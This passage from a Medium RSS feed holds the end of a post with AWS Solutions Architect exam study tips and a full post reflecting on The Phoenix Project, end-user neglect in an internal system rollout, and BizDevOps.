(EC2, Lambda)</strong></h4><h4>Networking &amp; Content Delivery (VPC, Elastic Load Balancing, CloudFront, Route53, Direct Connect, VPN, Global Accelerator)</h4><h4>Storage (S3, EBS, S3 Glacier, EFS)</h4><h4>Database (RDS, Aurora, DynamoDB, ElastiCache)</h4><h4>Security, Identity &amp; Compliance (IAM)</h4><h4>Management &amp; Governance (Auto Scaling, CloudWatch,)</h4><h4>Application Integration (SNS, SQS)</h4><h4>Cryptography &amp; PKI (KMS)</h4><h4>Analytics (Kinesis)</h4><h4>Containers (ECS, EKS)</h4><p>The below topics in my memory appeared once in the exam.</p><p>FSx, Storage Gateway, Elastic Beanstalk, Redshift, Cognito, GuardDuty, Resource Access Manager, WAF, Shield, Certificate Manager, CloudFormation, Config, CloudTrail, Systems Manager, DataSync, Database Migration Service, API Gateway, Glue, Athena, Billing &amp; Cost Management.</p><p>When I completed this stage, I felt that my mind was blowing. I was also frustrated as I couldn’t remember what I learned in the beginning. 
But don’t stress, keep reading.</p><h3>Connecting dots (~ 2w)</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dWnv979UtkMXjgvZgMGhNg.jpeg" /><figcaption>Photo by <a href="https://unsplash.com/@lucabravo?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Luca Bravo</a> on <a href="https://unsplash.com/s/photos/line?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></figcaption></figure><p>Each exam question basically describes a scenario and asks you to choose the best solution that satisfies the requirements.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3i-3bNC4gioW6xkI2rPP3Q.png" /><figcaption>example question</figcaption></figure><p>From this sample question, we can see that AWS is examining our ability to design a solution combining services. Well, this is definitely essential to a solutions architect, as an architecture is never complete without compute/storage/network/…</p><p>Apart from integrating each block (compute/storage/network, etc.), we need to associate them with the four domains.</p><p>I took the Architecting on AWS and Exam Readiness courses in Cloud U. The second course has an alternative on Pluralsight, called Demystifying the AWS Certified Solutions Architect: Associate Exam. 5-star rating, no complaints.</p><p>After the second round of study, you should be able to explain each bullet point in this extracted content outline.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/904/1*oXkM6K9OD9WI6ERh_TB2ww.png" /><figcaption>content outline</figcaption></figure><p>This is the most rewarding learning stage. You feel like you have a big-picture perspective now.</p><h3>Last sprint (~1w)</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KOthO862j3c2cn6rwuAMnA.jpeg" /></figure><p>I’m sure that you still don’t feel ready after completing the above stages. Let’s save 1 week to familiarise yourself with the exam and discover your blind spots through mock exams. There are many choices on Udemy. I find that they all provide detailed explanations for each question after you finish the test. This is really helpful. Taking many tests is unnecessary (4~5 is enough).</p><h3>General study techniques</h3><ol><li>Learn from mistakes. Note down all the questions you were unsure about or got wrong in practice. Review them from time to time.</li><li>Learn to compare. It occupies less storage in our brain as we only need to memorise differences. Common comparisons include EBS vs instance store, Classic LB vs ALB vs NLB, on demand vs spot vs reserved instances, etc.</li><li>Learn by associating. I always think of a parcel locker when I learn about decoupling architecture.</li><li>Learn through helping. When you explain certain concepts to others, you’re reinforcing your memory.</li><li>Learn in sleep. Knowledge is refined and consolidated during sleep. So sleep well.</li></ol><p>In the end, I have to admit that this exam was difficult for me. I feel that I still have a lot to learn. So this is not an end but a beginning.</p><p>Good luck to everyone who’s learning AWS SA. Let me know if there’s anything wrong in this guide. Also feel free to contact me if you need some prep talk haha.</p><p>Thank you for reading and sharing.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=bc6119262846" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[More than DevOps — another perspective on The Phoenix Project]]></title>
            <link>https://geek-lady.medium.com/more-than-devops-another-perspective-on-the-phoenix-project-c6634ab9cc5a?source=rss-d335d3a7fa8d------2</link>
            <guid isPermaLink="false">https://medium.com/p/c6634ab9cc5a</guid>
            <category><![CDATA[bizdevops]]></category>
            <category><![CDATA[the-phoenix-project]]></category>
            <category><![CDATA[it]]></category>
            <category><![CDATA[devops]]></category>
            <category><![CDATA[business-analyst]]></category>
            <dc:creator><![CDATA[Geek Lady]]></dc:creator>
            <pubDate>Fri, 08 May 2020 02:51:44 GMT</pubDate>
            <atom:updated>2020-05-08T02:51:44.719Z</atom:updated>
            <content:encoded><![CDATA[<h3>More than DevOps — another perspective on The Phoenix Project</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/406/0*mpyqiEIHIjlrHiln" /></figure><p>As the book subtitle shows, this book is about IT, DevOps and Business. It integrates DevOps principles into the story and vividly illustrates how organisations change. Everyone who works in IT projects should find the stories in the book familiar.</p><h3>My story</h3><p>I can relate to the book, but I want to tell my story from a different angle, the business perspective. I was a business analyst on a project which was very critical to the company, probably just like the Phoenix Project. The project was to bring competitive advantages to the company if successful. It involved replacing an old system with one that provides a new shopping experience for customers. While we were still in the development phase of the project, another project went to the deployment stage and created a lot of chaos afterwards. I can recall IT ops being busy putting out fires.</p><p>When the day came for our project to go live, everyone in the team was very excited. It was the first project on the new IT architecture to be put into production. I became excited as that was my first time experiencing a deployment. The business manager only gave us a time window of a few hours to deploy the new system. So we used the day to check servers, migrate static data, etc. At midnight, the old system was shut down and the new system was launched. We had developed a dashboard to capture exceptions. In the first two hours after the new system’s activation, I closely monitored the dashboard, ready to report any exceptions. It seemed a success, as no critical incident occurred. So I completed the documentation of the go-live and went home to sleep.</p><p>The next morning when I entered the office, my colleague told me to check OA. We had built a group specifically for end users of this project. My heart sank when I saw ‘99+’. Watching others do the work is very different from doing it yourself. I wished I could be split in two to share the burden. I tried my best to multi-task: one hand holding the phone listening to complaints, eyes on the screen, and the other hand typing answers. Days like this lasted for a while.</p><p>We analysed the causes of the incidents and found that about half were system deficiencies, and the rest were human mistakes, ranging from misunderstandings to wrong operations. The result was very surprising. It reminded me of the saying in cybersecurity circles that the <strong>human is the weakest link</strong>.</p><h3>Missing puzzle</h3><p>If we dive deeper, why do users still make mistakes after receiving training? The reasons vary.</p><ol><li>Not enough effective engagement</li></ol><p>When we did business analysis, we engaged a lot with the product manager, the marketing manager, etc., but little with end users. They were invited to workshops but they barely expressed their opinions. It wasn’t until UAT (User Acceptance Testing) that they became lead actors. Some of the end users received face-to-face training 2 weeks before the go-live. For the rest, who were in another city, we provided online training, wrote user manuals and recorded videos to help them learn. In the end, remote users made more mistakes than locals. We also didn’t establish a measurement system to examine the effectiveness of the training. End users claimed that they understood, but there’s a gap between understanding and acting.</p><p>2. No consideration of user experience</p>
<p>The requirements came mainly from one representative of the end users, who was their manager. Our focus was on functions. It’s very common for a backend system (where the end users are employees) to ignore UX. Here are some examples of backend system interfaces.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*kMU_Vq4h15Wm_S6L" /><figcaption>SAP CRM</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/754/0*hFMqowne5ON-BBxz" /><figcaption>Oracle EBS</figcaption></figure><p>Our system’s interface looks prettier than these two giants’ (I can’t share screenshots as they’re confidential). But we gave no consideration to UX. Also, end users only gave us feedback regarding functions rather than their experience. It appears that an end user simply has to endure a terribly designed experience. They didn’t like the system, so learning it was a task, not a pleasure. It’s rather pathetic that no one in the company cares about end users.</p><h3>Perhaps BizDevOps?</h3><p>I also asked the developers in my team whether they had considered end users. The answer was no.</p><p>I can understand why the company gives zero thought to end users. It’s an internal system, and a user-friendly internal system is not seen as adding value. The book stressed the importance of creating business value through IT. My project did achieve its business goals. But can it be called a success?</p><p>I doubt it. Reluctance towards the new system, low satisfaction…</p><p>My hunch is to introduce BizDevOps to the company. It should be more of a culture and a methodology than a set of tools and practices. I believe that many companies are already doing this, and I found that the term has already been coined. However, they need to ask these questions:</p><blockquote>Does business truly understand IT?</blockquote><blockquote>Does IT truly understand business?</blockquote><blockquote>How effective is the BA? (The BA is the conduit between Business and IT.)</blockquote><p>We need to shape IT’s mindset about user-centered design. It’s discussed a lot in software development but often ignored in internal projects. The BA needs to rethink the business definition, scope and goals. The BA needs to balance end users’ and their managers’ needs. Business leaders should care more about end users, letting them voice their opinions.</p><p>BizDevOps needs the collaboration of multiple parties and can only succeed on mutual understanding. I think that, based on this principle, you can find suitable ways to implement it in your company.</p><h3>Closure</h3><p>A couple of years have passed since that project was completed, but it left a strong impression on me. I’m certain that a lot has changed in IT projects. The adoption of agile methodology makes it easier to cater to business needs. If you have any thoughts, don’t hesitate to comment.</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=c6634ab9cc5a" width="1" height="1" alt="">]]></content:encoded>
        </item>
    </channel>
</rss>